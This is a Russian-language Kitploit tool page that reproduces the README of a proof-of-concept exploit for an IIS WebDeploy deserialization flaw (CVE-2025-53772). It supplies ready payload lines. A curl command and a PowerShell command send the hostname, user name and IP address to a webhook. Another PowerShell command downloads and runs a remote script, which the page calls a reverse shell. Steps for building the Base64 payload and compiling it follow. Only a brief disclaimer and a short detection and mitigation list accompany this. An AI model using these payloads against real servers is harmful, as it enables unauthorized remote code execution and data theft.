Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-53772-IIS-WebDeploy-RCE — Эксплойт proof-of-concept для CVE-2025-53772 — уязвимости удалённого выполнения кода в IIS WebDeploy через небезопасную десериализацию. Включает настраиваемую генерацию полезных нагрузок для сбора информации, выполнения команд и обратных оболочек. | Kitploit
Инструменты/GitHubGitHub/momollax/cve-2025-53772-iis-webdeploy-rce
ЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubmomollax/cve-2025-53772-iis-webdeploy-rce

CVE-2025-53772-IIS-WebDeploy-RCE

Эксплойт proof-of-concept для CVE-2025-53772 — уязвимости удалённого выполнения кода в IIS WebDeploy через небезопасную десериализацию. Включает настраиваемую генерацию полезных нагрузок для сбора информации, выполнения команд и обратных оболочек.

Репозиторий
5721 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-53772 - Эксплойт RCE для IIS WebDeploy

Этот репозиторий содержит эксплойт Proof-of-Concept (PoC) для CVE-2025-53772 — уязвимости удалённого выполнения кода в IIS WebDeploy, вызванной небезопасной десериализацией.

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением. Используйте только на системах, которыми вы владеете, или на которые у вас есть явное разрешение на тестирование.

🔧 Быстрая настройка

1. Настройка полезной нагрузки

Отредактируйте полезную нагрузку в файле poc.cs в строках 18–19, чтобы указать целевое действие: csharp// Замените на ваш URL вебхука и желаемую полезную нагрузку

root@kitploit:~
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");
3. Применение эксплойта Используйте сгенерированную полезную нагрузку Base64 против уязвимой конечной точки IIS WebDeploy: 🎯 Сведения об уязвимости

📋 Примеры полезных нагрузок

Сбор информации (рекомендуется):

root@kitploit:~
csharpset.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");

Простое выполнение команд:

root@kitploit:~
csharpset.Add("cmd.exe");
set.Add("/c calc.exe");  // Opens calculator

Обратная оболочка (продвинутый уровень):

root@kitploit:~
csharpset.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");

2. Генерация полезной нагрузки эксплойта

GitHub Action автоматически скомпилирует PoC и сгенерирует полезную нагрузку в кодировке Base64:

  • Отправьте свои изменения, чтобы запустить GitHub Action
  • Перейдите на вкладку Actions в вашем репозитории
  • Нажмите на последний запуск workflow
  • Найдите сгенерированную полезную нагрузку в выводе консоли:
Вывод полезной нагрузки GitHub Actions
Пример применения полезной нагрузки

Идентификатор CVE: CVE-2025-53772

Затронутое программное обеспечение: IIS WebDeploy (несколько версий) Тип уязвимости: Небезопасная десериализация, приводящая к RCE Вектор атаки: Удалённый, без аутентификации Серьёзность: Критическая

🛠️ Ручная компиляция (необязательно)

Если вы предпочитаете компилировать локально, а не через GitHub Actions: bash# Windows с .NET Framework C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs poc.exe > payload.txt

Или с помощью Visual Studio

csc poc.cs poc.exe 📡 Настройка вебхука

Перейдите на webhook.site, чтобы получить бесплатный URL вебхука Замените YOUR-WEBHOOK-ID в полезной нагрузке на ваш уникальный идентификатор Отслеживайте входящие запросы, чтобы увидеть результаты выполнения эксплойта

🔍 Обнаружение и смягчение последствий

Обнаружение:

  • Отслеживайте необычную активность десериализации BinaryFormatter
  • Ищите подозрительные процессы, порождаемые рабочими процессами IIS
  • Отслеживайте неожиданные исходящие соединения в сети

Смягчение:

  • Обновите IIS WebDeploy до последней исправленной версии
  • Внедрите проверку и очистку входных данных
  • Используйте списки разрешённых типов для десериализации
  • Разверните сегментацию сети и мониторинг

📚 Ссылки

Подробности CVE-2025-53772 Уведомление Microsoft о безопасности База данных уязвимостей NIST

Скачать инструмент